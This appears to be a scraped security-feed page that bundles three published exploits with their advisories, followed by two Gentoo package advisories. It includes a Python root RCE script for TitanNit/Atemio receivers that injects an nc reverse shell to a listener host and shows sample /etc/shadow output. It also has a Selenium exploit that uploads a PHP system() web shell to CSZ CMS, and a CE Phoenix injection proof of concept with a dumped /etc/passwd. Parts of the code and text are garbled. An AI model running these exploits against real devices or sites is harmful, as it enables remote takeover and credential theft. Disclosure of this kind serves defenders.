The Atemio AM 520 HD Full HD satellite receiver has a vulnerability that enables an unauthorized attacker to execute system commands with elevated privileges. This exploit is facilitated through the use of the getcommand query within the application, allowing the attacker to gain root access. Firmware versions 2.01 and below are affected.

    #!/usr/bin/env python# -*- coding: utf-8 -*-### TitanNit Web Control 2.01 / Atemio 7600 Root Remote Code Execution### Vendor: AAF Digital HD Forum | Atelmo GmbH# Product web page: http://www.aaf-digital.info | https://www.atemio.de# Affected version: Firmware <=2.01## Summary: The Atemio AM 520 HD Full HD satellite receiver enables the# reception of digital satellite programs in overwhelming image quality# in both SD and HD ranges. In addition to numerous connections, the small# all-rounder offers a variety of plugins that can be easily installed# thanks to the large flash memory. The TitanNit Linux software used combines# the advantages of the existing E2 and Neutrino systems and is therefore# fast, stable and adaptable.## Desc: The vulnerability in the device enables an unauthorized attacker# to execute system commands with elevated privileges. This exploit is# facilitated through the use of the 'getcommand' query within the application,# allowing the attacker to gain root access.## ========================================================================# _# python titannnit_rce.py 192.168.1.13:20000 192.168.1.8 9999# [*] Starting callback listener child thread# [*] Listening on port 9999# [*] Generating callback payload# [*] Calling# [*] Callback waiting: 3s# [*] ('192.168.1.13', 40943) called back# [*] Rootshell session opened# sh: cannot set terminal process group (1134): Inappropriate ioctl for device# sh: no job control in this shell# sh-5.1# id# <-sh-5.1# id# uid=0(root) gid=0(root)# sh-5.1# cat /etc/shadow | grep root# <-sh-5.1# cat /etc/shadow | grep root# root:$6$TAdBGj2mY***:18729:0:99999:7:::# sh-5.1# exit# [*] OK, bye!## _# # =======================================================================## Tested on: GNU/Linux 2.6.32.71 (STMicroelectronics)#            GNU/Linux 3.14-1.17 (armv7l)#            GNU/Linux 3.14.2 (mips)#            ATEMIO M46506 revision 990#            Atemio 7600 HD STB#            CPU STx7105 Mboard#            titan web server### Vulnerability discovered by Gjoko 'LiquidWorm' Krstic#                             @zeroscience### Advisory ID: ZSL-2023-5801# Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2023-5801.php### 16.11.2023#from time import sleepimport threadingimport requestsimport socketimport sysclass RemoteControl:    def __init__(self):        self.timeout = 10        self.target = None        self.callback = None        self.cstop = threading.Event()        self.path = "/query?getcommand=&cmd="        self.lport = None        self.cmd = None    def beacon(self):        self.cmd   = "mkfifo /tmp/j;cat /tmp/j|sh -i 2>&1|nc "        self.cmd  += self.callback + " "        self.cmd  += str(self.lport) + " "        self.cmd  += ">/tmp/j"        self.path += self.cmd        r = requests.get(self.target + self.path)    def slusaj(self):        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)        s.bind(("0.0.0.0", self.lport))        s.listen(1)        print("[*] Listening on port " + str(self.lport))        sleep(1)        try:            conn, addr = s.accept()            print("\n[*]", addr, "called back")            print("[*] Rootshell session opened")            self.cstop.set()        except socket.timeout:            print("[-] Call return timeout\n[!] Check your ports")            conn.close()        while True:            try:                odg = conn.recv(999999).decode()                sys.stdout.write(odg)                command = input()                command += "\n"                if "exit" in command:                    exit(-17)                conn.send(command.encode())                sleep(0.5)                sys.stdout.write("<-" + odg.split("\n")[-1])            except:                print("[*] OK, bye!")                exit(-1)        s.close()    def tajmer(self):        for z in range(self.timeout, 0, -1):            poraka = f"[*] Callback waiting: {z}s"            print(poraka, end='', flush=True)            sys.stdout.flush()            sleep(1)            if self.cstop.is_set():                break            print(' ' * len(poraka), end='\r')        if not self.cstop.is_set():            print("[-] Call return timeout\n[!] Check your ports")            exit(0)        else:            print(end=' ')    def thricer(self):        print("[*] Starting callback listener child thread")        plet1 = threading.Thread(name="ZSL", target=self.slusaj)        plet1.start()        sleep(1)        print("[*] Generating callback payload")        sleep(1)        print("[*] Calling")        plet2 = threading.Thread(name="ZSL", target=self.tajmer)        plet2.start()        self.beacon()        plet1.join()        plet2.join()    def howto(self):        if len(sys.argv) != 4:            self.usage()        else:            self.target = sys.argv[1]            self.callback = sys.argv[2]            self.lport = int(sys.argv[3])            if not self.target.startswith("http"):                self.target = "http://{}".format(self.target)    def dostabesemolk(self):        naslov = """    o===--------------------------------------===o    |                                            |    | TitanNit Web Control Remote Code Execution |    |                ZSL-2023-5801               |    |                                            |    o===--------------------------------------===o                          ||                          ||                          ||                          ||                          ||                          ||                          ||                          ||                          L!                         /_)                        / /L_______________________/ (__)_______________________  (__)                       \_(__)                          ||                          ||                          ||                          ||                          ||                          ||        """        print(naslov)    def usage(self):        self.dostabesemolk()        print("Usage: ./titan.py <target ip> <listen ip> <listen port>")        print("Example: ./titan.py 192.168.1.13:20000 192.168.1.8 9999")        exit(0)    def main(self):        self.howto()        self.thricer()if __name__ == '__main__':    RemoteControl().main()

TitanNit Web Control 2.01 / Atemio 7600 Root Remote Command Execution

CSZ CMS version 1.3.0 suffers from a remote command execution vulnerability. Exploit written in Python.

# Exploit Title: CSZ CMS Version 1.3.0 Remote Command Execution  
# Date: 17/11/2023  
# Exploit Author: tmrswrr  
# Vendor Homepage: https://www.cszcms.com/  
# Software Link: https://www.cszcms.com/link/3#https://sourceforge.net/projects/cszcms/files/latest/download  
# Version: Version 1.3.0  
# Tested on: https://www.softaculous.com/apps/cms/CSZ_CMS

import os  
import zipfile  
from selenium import webdriver  
from selenium.webdriver.common.by import By  
from selenium.webdriver.firefox.options import Options as FirefoxOptions  
from selenium.webdriver.firefox.service import Service as FirefoxService  
from webdriver_manager.firefox import GeckoDriverManager  
from selenium.webdriver.support.ui import WebDriverWait  
from selenium.webdriver.support import expected_conditions as EC  
from selenium.common.exceptions import NoSuchElementException, TimeoutException  
import requests  
from time import sleep  
import sys  
import random  
import time  
import platform  
import tarfile  
from io import BytesIO

email = "admin@admin.com"   
password = "password"

class colors:  
    OKBLUE = '\033[94m'  
    WARNING = '\033[93m'  
    FAIL = '\033[91m'  
    ENDC = '\033[0m'  
    BOLD = '\033[1m'  
    UNDERLINE = '\033[4m'  
    CBLACK = '\33[30m'  
    CRED = '\33[31m'  
    CGREEN = '\33[32m'  
    CYELLOW = '\33[33m'  
    CBLUE = '\33[34m'  
    CVIOLET = '\33[35m'  
    CBEIGE = '\33[36m'  
    CWHITE = '\33[37m'

color_random = [colors.CBLUE, colors.CVIOLET, colors.CWHITE, colors.OKBLUE, colors.CGREEN, colors.WARNING,  
                colors.CRED, colors.CBEIGE]  
random.shuffle(color_random)

def entryy():  
    x = color_random[0] + """

╭━━━┳━━━┳━━━━╮╭━━━┳━╮╭━┳━━━╮╭━━━┳━━━┳━━━╮╭━━━┳━╮╭━┳━━━┳╮╱╱╭━━━┳━━┳━━━━╮  
┃╭━╮┃╭━╮┣━━╮━┃┃╭━╮┃┃╰╯┃┃╭━╮┃┃╭━╮┃╭━╮┃╭━━╯┃╭━━┻╮╰╯╭┫╭━╮┃┃╱╱┃╭━╮┣┫┣┫╭╮╭╮┃  
┃┃╱╰┫╰━━╮╱╭╯╭╯┃┃╱╰┫╭╮╭╮┃╰━━╮┃╰━╯┃┃╱╰┫╰━━╮┃╰━━╮╰╮╭╯┃╰━╯┃┃╱╱┃┃╱┃┃┃┃╰╯┃┃╰╯  
┃┃╱╭╋━━╮┃╭╯╭╯╱┃┃╱╭┫┃┃┃┃┣━━╮┃┃╭╮╭┫┃╱╭┫╭━━╯┃╭━━╯╭╯╰╮┃╭━━┫┃╱╭┫┃╱┃┃┃┃╱╱┃┃  
┃╰━╯┃╰━╯┣╯━╰━╮┃╰━╯┃┃┃┃┃┃╰━╯┃┃┃┃╰┫╰━╯┃╰━━╮┃╰━━┳╯╭╮╰┫┃╱╱┃╰━╯┃╰━╯┣┫┣╮╱┃┃  
╰━━━┻━━━┻━━━━╯╰━━━┻╯╰╯╰┻━━━╯╰╯╰━┻━━━┻━━━╯╰━━━┻━╯╰━┻╯╱╱╰━━━┻━━━┻━━╯╱╰╯

                <<   CSZ CMS Version 1.3.0 RCE     >>  
                <<      CODED BY TMRSWRR           >>  
                <<     GITHUB==>capture0x          >>

\n"""  
    for c in x:  
        print(c, end='')  
        sys.stdout.flush()  
        sleep(0.0045)  
    oo = " " * 6 + 29 * "░⣿" + "\n\n"  
    for c in oo:  
        print(colors.CGREEN + c, end='')  
        sys.stdout.flush()  
        sleep(0.0065)

    tt = " " * 5 + "░⣿" + " " * 6 + "WELCOME TO CSZ CMS Version 1.3.0 RCE Exploit" + " " * 7 + "░⣿" + "\n\n"  
    for c in tt:  
        print(colors.CWHITE + c, end='')  
        sys.stdout.flush()  
        sleep(0.0065)  
    xx = " " * 6 + 29 * "░⣿" + "\n\n"  
    for c in xx:  
        print(colors.CGREEN + c, end='')  
        sys.stdout.flush()  
        sleep(0.0065)

def check_geckodriver():  
    current_directory = os.path.dirname(os.path.abspath(__file__))  
    geckodriver_path = os.path.join(current_directory, 'geckodriver')

    if not os.path.isfile(geckodriver_path):  
        red = "\033[91m"  
        reset = "\033[0m"  
        print(red + "\n\nGeckoDriver (geckodriver) is not available in the script's directory." + reset)  
        user_input = input("Would you like to download it now? (yes/no): ").lower()  
        if user_input == 'yes':  
            download_geckodriver(current_directory)  
        else:  
            print(red + "Please download GeckoDriver manually from: https://github.com/mozilla/geckodriver/releases" + reset)  
            sys.exit(1)

def download_geckodriver(directory):

    print("[*] Detecting OS and architecture...")  
    os_name = platform.system().lower()  
    arch, _ = platform.architecture()

    if os_name == "linux":  
        os_name = "linux"  
        arch = "64" if arch == "64bit" else "32"  
    elif os_name == "darwin":  
        os_name = "macos"  
        arch = "aarch64" if platform.processor() == "arm" else ""  
    elif os_name == "windows":  
        os_name = "win"  
        arch = "64" if arch == "64bit" else "32"  
    else:  
        print("[!] Unsupported operating system.")  
        sys.exit(1)

    geckodriver_version = "v0.33.0"  
    geckodriver_file = f"geckodriver-{geckodriver_version}-{os_name}{arch}"  
    ext = "zip" if os_name == "win" else "tar.gz"  
    url = f"https://github.com/mozilla/geckodriver/releases/download/{geckodriver_version}/{geckodriver_file}.{ext}"

    print(f"[*] Downloading GeckoDriver for {platform.system()} {arch}-bit...")  
    response = requests.get(url, stream=True)

    if response.status_code == 200:  
        print("[*] Extracting GeckoDriver...")  
        if ext == "tar.gz":  
            with tarfile.open(fileobj=BytesIO(response.content), mode="r:gz") as tar:  
                tar.extractall(path=directory)  
        else:     
            with zipfile.ZipFile(BytesIO(response.content)) as zip_ref:  
                zip_ref.extractall(directory)  
        print("[+] GeckoDriver downloaded and extracted successfully.")  
    else:  
        print("[!] Failed to download GeckoDriver.")  
        sys.exit(1)

        def create_zip_file(php_filename, zip_filename, php_code):  
    try:  
        with open(php_filename, 'w') as file:  
            file.write(php_code)  
        with zipfile.ZipFile(zip_filename, 'w') as zipf:  
            zipf.write(php_filename)  
        print("[+] Zip file created successfully.")  
        os.remove(php_filename)  
        return zip_filename  
    except Exception as e:  
        print(f"[!] Error creating zip file: {e}")  
        sys.exit(1)

def main(base_url, command):

    if not base_url.endswith('/'):  
        base_url += '/'

            zip_filename = None   

    check_geckodriver()  
    try:  
        firefox_options = FirefoxOptions()  
        firefox_options.add_argument("--headless")

        script_directory = os.path.dirname(os.path.abspath(__file__))  
        geckodriver_path = os.path.join(script_directory, 'geckodriver')  
        service = FirefoxService(executable_path=geckodriver_path)  
        driver = webdriver.Firefox(service=service, options=firefox_options)  
        print("[*] Exploit initiated.")

        # Login  
        driver.get(base_url + "admin/login")  
        print("[*] Accessing login page...")  
        driver.find_element(By.NAME, "email").send_keys(f"{email}")  
        driver.find_element(By.NAME, "password").send_keys(f"{password}")  
        driver.find_element(By.ID, "login_submit").click()  
        print("[*] Credentials submitted...")

         try:  
            error_message = driver.find_element(By.XPATH, "//*[contains(text(), 'Email address/Password is incorrect')]")  
            if error_message.is_displayed():  
                print("[!] Login failed: Invalid credentials.")  
                driver.quit()  
                sys.exit(1)  
        except NoSuchElementException:  
            print("[+] Login successful.")

        # File creation    
        print("[*] Preparing exploit files...")  
        php_code = f"<?php echo system('{command}'); ?>"  
        zip_filename = create_zip_file("exploit.php", "payload.zip", php_code)

         driver.get(base_url + "admin/upgrade")  
        print("[*] Uploading exploit payload...")  
        file_input = driver.find_element(By.ID, "file_upload")  
        file_input.send_keys(os.path.join(os.getcwd(), zip_filename))

    # Uploading  
        driver.find_element(By.ID, "submit").click()  
        WebDriverWait(driver, 10).until(EC.alert_is_present())  
        alert = driver.switch_to.alert  
        alert.accept()

        # Exploit result   
        exploit_url = base_url + "exploit.php"  
        response = requests.get(exploit_url)  
        print(f"[+] Exploit response:\n\n{response.text}")

    except Exception as e:  
        print(f"[!] Error: {e}")  
    finally:  
        driver.quit()  
        if zip_filename and os.path.exists(zip_filename):  
            os.remove(zip_filename)

if __name__ == "__main__":  
    entryy()  
    if len(sys.argv) < 3:  
        print("Usage: python script.py [BASE_URL] [COMMAND]")  
    else:  
        main(sys.argv[1], sys.argv[2])

CSZ CMS 1.3.0 Remote Command Execution

CE Phoenix version 1.0.8.20 suffers from an authenticated remote command execution vulnerability.

    ## Exploit Title: CE Phoenix v1.0.8.20 - Remote Code Execution (RCE) (Authenticated)#### Date: 2023-11-25#### Exploit Author: tmrswrr#### Category: Webapps#### Vendor Homepage: [CE Phoenix](https://phoenixcart.org/)#### Version: v1.0.8.20#### Tested on: [Softaculous Demo - CE Phoenix](https://www.softaculous.com/apps/ecommerce/CE_Phoenix)### POC:<img src="https://raw.githubusercontent.com/capture0x/Phoenix/main/1.png" alt="Magento Image" width="1000"><img src="https://raw.githubusercontent.com/capture0x/Phoenix/main/2.png" alt="Magento Image" width="1000">1. **Login to admin panel:**     - Visit: `https://demos6.softaculous.com/CE_Phoenixvkqhcarjmw/admin/define_language.php?lngdir=english`    2. **Access english.php:**    - Click on `english.php` and inject the payload:     ```    <?php echo system('cat /etc/passwd'); ?>    ```    3. **Save Changes:**    - Save the modified file.4. **View Results:**    - Visit the main page: `https://demos6.softaculous.com/CE_Phoenixvkqhcarjmw/`    - You will see the following result:root:x:0:0:root:/root:/bin/bashbin:x:1:1:bin:/bin:/sbin/nologindaemon:x:2:2:daemon:/sbin:/sbin/nologinadm:x:3:4:adm:/var/adm:/sbin/nologinlp:x:4:7:lp:/var/spool/lpd:/sbin/nologinsync:x:5:0:sync:/sbin:/bin/syncshutdown:x:6:0:shutdown:/sbin:/sbin/shutdownhalt:x:7:0:halt:/sbin:/sbin/haltmail:x:8:12:mail:/var/spool/mail:/sbin/nologinoperator:x:11:0:operator:/root:/sbin/nologingames:x:12:100:games:/usr/games:/sbin/nologinftp:x:14:50:FTP User:/var/ftp:/sbin/nologinnobody:x:99:99:Nobody:/:/sbin/nologinsystemd-bus-proxy:x:999:998:systemd Bus Proxy:/:/sbin/nologinsystemd-network:x:192:192:systemd Network Management:/:/sbin/nologindbus:x:81:81:System message bus:/:/sbin/nologinpolkitd:x:998:997:User for polkitd:/:/sbin/nologintss:x:59:59:Account used by the trousers package to sandbox the tcsd daemon:/dev/null:/sbin/nologinsshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologinpostfix:x:89:89::/var/spool/postfix:/sbin/nologinchrony:x:997:995::/var/lib/chrony:/sbin/nologinsoft:x:1000:1000::/home/soft:/sbin/nologinsaslauth:x:996:76:Saslauthd user:/run/saslauthd:/sbin/nologinmailnull:x:47:47::/var/spool/mqueue:/sbin/nologinsmmsp:x:51:51::/var/spool/mqueue:/sbin/nologinemps:x:995:1001::/home/emps:/bin/bashnamed:x:25:25:Named:/var/named:/sbin/nologinexim:x:93:93::/var/spool/exim:/sbin/nologinvmail:x:5000:5000::/var/local/vmail:/bin/bashmysql:x:27:27:MySQL Server:/var/lib/mysql:/bin/falsewebuzo:x:993:993::/home/webuzo:/bin/bashapache:x:992:991::/home/apache:/sbin/nologinapache:x:992:991::/home/apache:/sbin/nologin

CE Phoenix 1.0.8.20 Remote Command Execution

The vulnerability in the device enables an unauthorized attacker to execute system commands with elevated privileges. This exploit is facilitated through the use of the 'getcommand' query within the application, allowing the attacker to gain root access.

Title: TitanNit Web Control 2.01 / Atemio 7600 Root Remote Code Execution  
Advisory ID: ZSL-2023-5801  
Type: Local/Remote  
Impact: System Access, DoS  
Risk: (5/5)  
Release Date: 25.11.2023

**Summary**

The Atemio AM 520 HD Full HD satellite receiver enables the reception of digital satellite programs in overwhelming image quality in both SD and HD ranges. In addition to numerous connections, the small all-rounder offers a variety of plugins that can be easily installed thanks to the large flash memory. The TitanNit Linux software used combines the advantages of the existing E2 and Neutrino systems and is therefore fast, stable and adaptable.

**Description**

The vulnerability in the device enables an unauthorized attacker to execute system commands with elevated privileges. This exploit is facilitated through the use of the 'getcommand' query within the application, allowing the attacker to gain root access.

**Vendor**

AAF Digital HD Forum | Atelmo GmbH - http://www.aaf-digital.info | https://www.atemio.de

**Affected Version**

Firmware <=2.01

**Tested On**

GNU/Linux 2.6.32.71 (STMicroelectronics)  
GNU/Linux 3.14-1.17 (armv7l)  
GNU/Linux 3.14.2 (mips)  
ATEMIO M46506 revision 990  
Atemio 7600 HD STB  
CPU STx7105 Mboard  
titan web server

**Vendor Status**

N/A

**PoC**

titannit\_rce.py

**Credits**

Vulnerability discovered by Gjoko Krstic - <gjoko@zeroscience.mk\>

**References**

N/A

**Changelog**

\[25.11.2023\] - Initial release

**Contact**

Zero Science Lab

Web: https://www.zeroscience.mk  
e-mail: lab@zeroscience.mk

TitanNit Web Control 2.01 / Atemio 7600 Root Remote Code Execution

Gentoo Linux Security Advisory 202311-12 - Multiple vulnerabilities have been discovered in MiniDLNA, the worst of which could lead to remote code execution. Versions greater than or equal to 1.3.3 are affected.

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
Gentoo Linux Security Advisory                           GLSA 202311-12  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
                                           https://security.gentoo.org/  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

 Severity: High  
    Title: MiniDLNA: Multiple Vulnerabilities  
     Date: November 25, 2023  
     Bugs: #834642, #907926  
       ID: 202311-12

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis  
=======  
Multiple vulnerabilities have been discovered in MiniDLNA, the worst of  
which could lead to remove code execution.

Background  
=========  
MiniDLNA is a simple media server software, with the aim of being fully  
compliant with DLNA/UPnP-AV clients.

Affected packages  
================  
Package            Vulnerable    Unaffected  
-----------------  ------------  ------------  
net-misc/minidlna  < 1.3.3       >= 1.3.3

Description  
==========  
Multiple vulnerabilities have been discovered in MiniDLNA. Please review  
the CVE identifiers referenced below for details.

Impact  
=====  
Please review the referenced CVE identifiers for details.

Workaround  
=========  
There is no known workaround at this time.

Resolution  
=========  
All MiniDLNA users should upgrade to the latest version:

  # emerge --sync  
  # emerge --ask --oneshot --verbose ">=net-misc/minidlna-1.3.3"

References  
=========  
[ 1 ] CVE-2022-26505  
      https://nvd.nist.gov/vuln/detail/CVE-2022-26505  
[ 2 ] CVE-2023-33476  
      https://nvd.nist.gov/vuln/detail/CVE-2023-33476

Availability  
===========  
This GLSA and any updates to it are available for viewing at  
the Gentoo Security Website:

 https://security.gentoo.org/glsa/202311-12

Concerns?  
========  
Security is a primary focus of Gentoo Linux and ensuring the  
confidentiality and security of our users' machines is of utmost  
importance to us. Any security concerns should be addressed to  
security@gentoo.org or alternatively, you may file a bug at  
https://bugs.gentoo.org.

License  
======  
Copyright 2023 Gentoo Foundation, Inc; referenced text  
belongs to its owner(s).

The contents of this document are licensed under the  
Creative Commons - Attribution / Share Alike license.

https://creativecommons.org/licenses/by-sa/2.5

Gentoo Linux Security Advisory 202311-12

Gentoo Linux Security Advisory 202311-11 - Multiple vulnerabilities have been discovered in QtWebEngine, the worst of which could lead to remote code execution. Versions greater than or equal to 5.15.10_p20230623 are affected.

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
Gentoo Linux Security Advisory                           GLSA 202311-11  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
                                           https://security.gentoo.org/  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

 Severity: High  
    Title: QtWebEngine: Multiple Vulnerabilities  
     Date: November 25, 2023  
     Bugs: #866332, #888181, #903544, #904290, #906857, #909778  
       ID: 202311-11

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis  
=======  
Multiple vulnerabilities have been discovered in QtWebEngine, the worst  
of which could lead to remote code execution.

Background  
=========  
QtWebEngine is a library for rendering dynamic web content in Qt5 and  
Qt6 C++ and QML applications.

Affected packages  
================  
Package             Vulnerable           Unaffected  
------------------  -------------------  --------------------  
dev-qt/qtwebengine  < 5.15.10_p20230623  >= 5.15.10_p20230623

Description  
==========  
Multiple vulnerabilities have been discovered in QtWebEngine. Please  
review the CVE identifiers referenced below for details.

Impact  
=====  
Please review the referenced CVE identifiers for details.

Workaround  
=========  
There is no known workaround at this time.

Resolution  
=========  
All QtWebEngine users should upgrade to the latest version:

  # emerge --sync  
  # emerge --ask --oneshot --verbose ">Þv-qt/qtwebengine-5.15.10_p20230623"

References  
=========  
[ 1 ] CVE-2022-2294  
      https://nvd.nist.gov/vuln/detail/CVE-2022-2294  
[ 2 ] CVE-2022-3201  
      https://nvd.nist.gov/vuln/detail/CVE-2022-3201  
[ 3 ] CVE-2022-4174  
      https://nvd.nist.gov/vuln/detail/CVE-2022-4174  
[ 4 ] CVE-2022-4175  
      https://nvd.nist.gov/vuln/detail/CVE-2022-4175  
[ 5 ] CVE-2022-4176  
      https://nvd.nist.gov/vuln/detail/CVE-2022-4176  
[ 6 ] CVE-2022-4177  
      https://nvd.nist.gov/vuln/detail/CVE-2022-4177  
[ 7 ] CVE-2022-4178  
      https://nvd.nist.gov/vuln/detail/CVE-2022-4178  
[ 8 ] CVE-2022-4179  
      https://nvd.nist.gov/vuln/detail/CVE-2022-4179  
[ 9 ] CVE-2022-4180  
      https://nvd.nist.gov/vuln/detail/CVE-2022-4180  
[ 10 ] CVE-2022-4181  
      https://nvd.nist.gov/vuln/detail/CVE-2022-4181  
[ 11 ] CVE-2022-4182  
      https://nvd.nist.gov/vuln/detail/CVE-2022-4182  
[ 12 ] CVE-2022-4183  
      https://nvd.nist.gov/vuln/detail/CVE-2022-4183  
[ 13 ] CVE-2022-4184  
      https://nvd.nist.gov/vuln/detail/CVE-2022-4184  
[ 14 ] CVE-2022-4185  
      https://nvd.nist.gov/vuln/detail/CVE-2022-4185  
[ 15 ] CVE-2022-4186  
      https://nvd.nist.gov/vuln/detail/CVE-2022-4186  
[ 16 ] CVE-2022-4187  
      https://nvd.nist.gov/vuln/detail/CVE-2022-4187  
[ 17 ] CVE-2022-4188  
      https://nvd.nist.gov/vuln/detail/CVE-2022-4188  
[ 18 ] CVE-2022-4189  
      https://nvd.nist.gov/vuln/detail/CVE-2022-4189  
[ 19 ] CVE-2022-4190  
      https://nvd.nist.gov/vuln/detail/CVE-2022-4190  
[ 20 ] CVE-2022-4191  
      https://nvd.nist.gov/vuln/detail/CVE-2022-4191  
[ 21 ] CVE-2022-4192  
      https://nvd.nist.gov/vuln/detail/CVE-2022-4192  
[ 22 ] CVE-2022-4193  
      https://nvd.nist.gov/vuln/detail/CVE-2022-4193  
[ 23 ] CVE-2022-4194  
      https://nvd.nist.gov/vuln/detail/CVE-2022-4194  
[ 24 ] CVE-2022-4195  
      https://nvd.nist.gov/vuln/detail/CVE-2022-4195  
[ 25 ] CVE-2022-4436  
      https://nvd.nist.gov/vuln/detail/CVE-2022-4436  
[ 26 ] CVE-2022-4437  
      https://nvd.nist.gov/vuln/detail/CVE-2022-4437  
[ 27 ] CVE-2022-4438  
      https://nvd.nist.gov/vuln/detail/CVE-2022-4438  
[ 28 ] CVE-2022-4439  
      https://nvd.nist.gov/vuln/detail/CVE-2022-4439  
[ 29 ] CVE-2022-4440  
      https://nvd.nist.gov/vuln/detail/CVE-2022-4440  
[ 30 ] CVE-2022-41115  
      https://nvd.nist.gov/vuln/detail/CVE-2022-41115  
[ 31 ] CVE-2022-44688  
      https://nvd.nist.gov/vuln/detail/CVE-2022-44688  
[ 32 ] CVE-2022-44708  
      https://nvd.nist.gov/vuln/detail/CVE-2022-44708  
[ 33 ] CVE-2023-0128  
      https://nvd.nist.gov/vuln/detail/CVE-2023-0128  
[ 34 ] CVE-2023-0129  
      https://nvd.nist.gov/vuln/detail/CVE-2023-0129  
[ 35 ] CVE-2023-0130  
      https://nvd.nist.gov/vuln/detail/CVE-2023-0130  
[ 36 ] CVE-2023-0131  
      https://nvd.nist.gov/vuln/detail/CVE-2023-0131  
[ 37 ] CVE-2023-0132  
      https://nvd.nist.gov/vuln/detail/CVE-2023-0132  
[ 38 ] CVE-2023-0133  
      https://nvd.nist.gov/vuln/detail/CVE-2023-0133  
[ 39 ] CVE-2023-0134  
      https://nvd.nist.gov/vuln/detail/CVE-2023-0134  
[ 40 ] CVE-2023-0135  
      https://nvd.nist.gov/vuln/detail/CVE-2023-0135  
[ 41 ] CVE-2023-0136  
      https://nvd.nist.gov/vuln/detail/CVE-2023-0136  
[ 42 ] CVE-2023-0137  
      https://nvd.nist.gov/vuln/detail/CVE-2023-0137  
[ 43 ] CVE-2023-0138  
      https://nvd.nist.gov/vuln/detail/CVE-2023-0138  
[ 44 ] CVE-2023-0139  
      https://nvd.nist.gov/vuln/detail/CVE-2023-0139  
[ 45 ] CVE-2023-0140  
      https://nvd.nist.gov/vuln/detail/CVE-2023-0140  
[ 46 ] CVE-2023-0141  
      https://nvd.nist.gov/vuln/detail/CVE-2023-0141  
[ 47 ] CVE-2023-2721  
      https://nvd.nist.gov/vuln/detail/CVE-2023-2721  
[ 48 ] CVE-2023-2722  
      https://nvd.nist.gov/vuln/detail/CVE-2023-2722  
[ 49 ] CVE-2023-2723  
      https://nvd.nist.gov/vuln/detail/CVE-2023-2723  
[ 50 ] CVE-2023-2724  
      https://nvd.nist.gov/vuln/detail/CVE-2023-2724  
[ 51 ] CVE-2023-2725  
      https://nvd.nist.gov/vuln/detail/CVE-2023-2725  
[ 52 ] CVE-2023-2726  
      https://nvd.nist.gov/vuln/detail/CVE-2023-2726  
[ 53 ] CVE-2023-2929  
      https://nvd.nist.gov/vuln/detail/CVE-2023-2929  
[ 54 ] CVE-2023-2930  
      https://nvd.nist.gov/vuln/detail/CVE-2023-2930  
[ 55 ] CVE-2023-2931  
      https://nvd.nist.gov/vuln/detail/CVE-2023-2931  
[ 56 ] CVE-2023-2932  
      https://nvd.nist.gov/vuln/detail/CVE-2023-2932  
[ 57 ] CVE-2023-2933  
      https://nvd.nist.gov/vuln/detail/CVE-2023-2933  
[ 58 ] CVE-2023-2934  
      https://nvd.nist.gov/vuln/detail/CVE-2023-2934  
[ 59 ] CVE-2023-2935  
      https://nvd.nist.gov/vuln/detail/CVE-2023-2935  
[ 60 ] CVE-2023-2936  
      https://nvd.nist.gov/vuln/detail/CVE-2023-2936  
[ 61 ] CVE-2023-2937  
      https://nvd.nist.gov/vuln/detail/CVE-2023-2937  
[ 62 ] CVE-2023-2938  
      https://nvd.nist.gov/vuln/detail/CVE-2023-2938  
[ 63 ] CVE-2023-2939  
      https://nvd.nist.gov/vuln/detail/CVE-2023-2939  
[ 64 ] CVE-2023-2940  
      https://nvd.nist.gov/vuln/detail/CVE-2023-2940  
[ 65 ] CVE-2023-2941  
      https://nvd.nist.gov/vuln/detail/CVE-2023-2941  
[ 66 ] CVE-2023-3079  
      https://nvd.nist.gov/vuln/detail/CVE-2023-3079  
[ 67 ] CVE-2023-3214  
      https://nvd.nist.gov/vuln/detail/CVE-2023-3214  
[ 68 ] CVE-2023-3215  
      https://nvd.nist.gov/vuln/detail/CVE-2023-3215  
[ 69 ] CVE-2023-3216  
      https://nvd.nist.gov/vuln/detail/CVE-2023-3216  
[ 70 ] CVE-2023-3217  
      https://nvd.nist.gov/vuln/detail/CVE-2023-3217  
[ 71 ] CVE-2023-4068  
      https://nvd.nist.gov/vuln/detail/CVE-2023-4068  
[ 72 ] CVE-2023-4069  
      https://nvd.nist.gov/vuln/detail/CVE-2023-4069  
[ 73 ] CVE-2023-4070  
      https://nvd.nist.gov/vuln/detail/CVE-2023-4070  
[ 74 ] CVE-2023-4071  
      https://nvd.nist.gov/vuln/detail/CVE-2023-4071  
[ 75 ] CVE-2023-4072  
      https://nvd.nist.gov/vuln/detail/CVE-2023-4072  
[ 76 ] CVE-2023-4073  
      https://nvd.nist.gov/vuln/detail/CVE-2023-4073  
[ 77 ] CVE-2023-4074  
      https://nvd.nist.gov/vuln/detail/CVE-2023-4074  
[ 78 ] CVE-2023-4075  
      https://nvd.nist.gov/vuln/detail/CVE-2023-4075  
[ 79 ] CVE-2023-4076  
      https://nvd.nist.gov/vuln/detail/CVE-2023-4076  
[ 80 ] CVE-2023-4077  
      https://nvd.nist.gov/vuln/detail/CVE-2023-4077  
[ 81 ] CVE-2023-4078  
      https://nvd.nist.gov/vuln/detail/CVE-2023-4078  
[ 82 ] CVE-2023-4761  
      https://nvd.nist.gov/vuln/detail/CVE-2023-4761  
[ 83 ] CVE-2023-4762  
      https://nvd.nist.gov/vuln/detail/CVE-2023-4762  
[ 84 ] CVE-2023-4763  
      https://nvd.nist.gov/vuln/detail/CVE-2023-4763  
[ 85 ] CVE-2023-4764  
      https://nvd.nist.gov/vuln/detail/CVE-2023-4764  
[ 86 ] CVE-2023-5218  
      https://nvd.nist.gov/vuln/detail/CVE-2023-5218  
[ 87 ] CVE-2023-5473  
      https://nvd.nist.gov/vuln/detail/CVE-2023-5473  
[ 88 ] CVE-2023-5474  
      https://nvd.nist.gov/vuln/detail/CVE-2023-5474  
[ 89 ] CVE-2023-5475  
      https://nvd.nist.gov/vuln/detail/CVE-2023-5475  
[ 90 ] CVE-2023-5476  
      https://nvd.nist.gov/vuln/detail/CVE-2023-5476  
